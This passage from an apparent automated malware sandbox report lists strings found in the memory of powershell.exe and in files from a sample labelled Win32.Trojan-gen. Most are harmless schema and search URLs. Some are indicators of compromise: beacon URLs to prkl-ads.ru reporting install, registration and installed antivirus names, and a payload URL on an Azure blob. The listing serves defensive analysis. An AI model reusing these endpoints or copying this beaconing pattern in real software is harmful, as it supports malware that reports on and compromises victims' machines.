                  Source: powershell.exe, 00000005.00000002.559613303.0000000068728000.00000020.00000001.01000000.0000001A.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                  Source: powershell.exe, 00000005.00000002.559613303.0000000068728000.00000020.00000001.01000000.0000001A.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/EInvalidGlobalDataContractNamespace?DataContractNamespaceAlr
                  Source: powershell.exe, 00000005.00000002.559613303.0000000068728000.00000020.00000001.01000000.0000001A.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/System.Xml
                  Source: powershell.exe, 00000005.00000002.559613303.0000000068728000.00000020.00000001.01000000.0000001A.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/System.Xml.Linq?IsValueTypeFormattedIncorrectly1BaseTypeNotI
                  Source: powershell.exe, 00000005.00000002.559613303.0000000068728000.00000020.00000001.01000000.0000001A.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/dhttp://schemas.datacontract.org/2004/07/System.XmlRhttp://w
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004EEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004EEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004EEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004EEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004EEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004EEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004EEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004EEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004EEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004EEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004EEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004EEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004EEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004EEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possesspropertyP=
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.dr, MSI750A.tmp.1.dr, MSI74BB.tmp.1.dr, MSI7331.tmp.1.dr, MSI6AF5.tmp.0.drString found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.dr, MSI750A.tmp.1.dr, MSI74BB.tmp.1.dr, MSI7331.tmp.1.dr, MSI6AF5.tmp.0.drString found in binary or memory: http://t2.symcb.com0
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.523653859.0000000004EEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.559613303.0000000068728000.00000020.00000001.01000000.0000001A.sdmpString found in binary or memory: http://tempuri.org/
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.523653859.0000000004EEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.523653859.0000000004F80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.523653859.0000000004FAD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Contract/MSValue1
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.523653859.0000000004EEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.523653859.0000000004F80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.523653859.0000000004FAD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Contract/MSValue1Response
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Contract/MSValue1ResponseD
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004EEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.523653859.0000000004F80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.523653859.0000000004FAD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Contract/MSValue2
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.523653859.0000000004EEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.523653859.0000000004F80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.523653859.0000000004FAD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Contract/MSValue2Response
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Contract/MSValue2ResponseD
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004EEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.523653859.0000000004F80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.523653859.0000000004FAD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Contract/MSValue3
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.556972704.000000000DD11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.523653859.0000000004EEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.523653859.0000000004F80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.523653859.0000000004FAD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Contract/MSValue3Response
                  Source: powershell.exe, 00000005.00000002.556972704.000000000DD11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Contract/MSValue3ResponseD
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/D
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/V
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.dr, MSI750A.tmp.1.dr, MSI74BB.tmp.1.dr, MSI7331.tmp.1.dr, MSI6AF5.tmp.0.drString found in binary or memory: http://tl.symcb.com/tl.crl0
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.dr, MSI750A.tmp.1.dr, MSI74BB.tmp.1.dr, MSI7331.tmp.1.dr, MSI6AF5.tmp.0.drString found in binary or memory: http://tl.symcb.com/tl.crt0
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.dr, MSI750A.tmp.1.dr, MSI74BB.tmp.1.dr, MSI7331.tmp.1.dr, MSI6AF5.tmp.0.drString found in binary or memory: http://tl.symcd.com0&
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004BD9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.404099594.00000000070DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: powershell.exe, 00000005.00000002.556972704.000000000DD11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.o
                  Source: powershell.exe, 00000005.00000003.507468238.000000000509A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.507468238.00000000051FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.507468238.000000000514C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecLR
                  Source: powershell.exe, 00000005.00000002.528616904.0000000006866000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.000000000683D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004EEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/ip
                  Source: powershell.exe, 00000005.00000002.528616904.0000000006866000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.000000000683D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: powershell.exe, 00000005.00000002.528616904.0000000005B06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000005.00000002.528616904.0000000005B06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000005.00000002.528616904.0000000005B06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: powershell.exe, 00000005.00000002.528616904.0000000006866000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.000000000683D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: powershell.exe, 00000005.00000002.528616904.0000000006A0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.507468238.000000000509A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.507468238.00000000051FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.550362681.000000000A52D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.0000000006972000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.550362681.000000000A493000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.000000000699B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.507468238.000000000514C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.0000000006901000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.00000000068D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.550362681.000000000A4BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.550362681.000000000A556000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.0000000006A35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.0000000006866000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.000000000683D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: powershell.exe, 00000005.00000002.528616904.0000000006866000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.000000000683D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004BD9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.404099594.00000000070DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: powershell.exe, 00000005.00000003.403270333.00000000054FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004DFF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://metacookie25c19ec61c.blob.core.windows.net
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004BD9000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.drString found in binary or memory: https://metacookie25c19ec61c.blob.core.windows.net/test/build.jpg
                  Source: powershell.exe, 00000005.00000002.528616904.0000000005B06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004BD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://prkl-ads.ru
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004BD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://prkl-ads.ru/?status=install(:
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004BD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://prkl-ads.ru/?status=reg&key=llks74638sj&site=Test
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004BD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://prkl-ads.ru/?status=start&av=
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004BD9000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.drString found in binary or memory: https://prkl-ads.ru/?status=start&av=$displayNamesString
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004D48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://prkl-ads.ru/?status=start&av=Windows
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004BD9000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.drString found in binary or memory: https://prkl-ads.ru?status=reg&key=llks74638sj&site=Test
                  Source: powershell.exe, 00000005.00000002.528616904.0000000006A0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.507468238.000000000509A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.507468238.00000000051FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.550362681.000000000A52D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.0000000006972000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.550362681.000000000A493000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.000000000699B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.507468238.000000000514C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.0000000006901000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.00000000068D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.550362681.000000000A4BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.550362681.000000000A556000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.0000000006A35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.0000000006866000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.000000000683D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                  Source: powershell.exe, 00000005.00000002.528616904.0000000006A0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.507468238.000000000509A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.507468238.00000000051FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.550362681.000000000A52D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.0000000006972000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.550362681.000000000A493000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.000000000699B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.507468238.000000000514C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.0000000006901000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.00000000068D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.550362681.000000000A4BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.550362681.000000000A556000.00000004.00000800.00020000.00000000.sdmp, 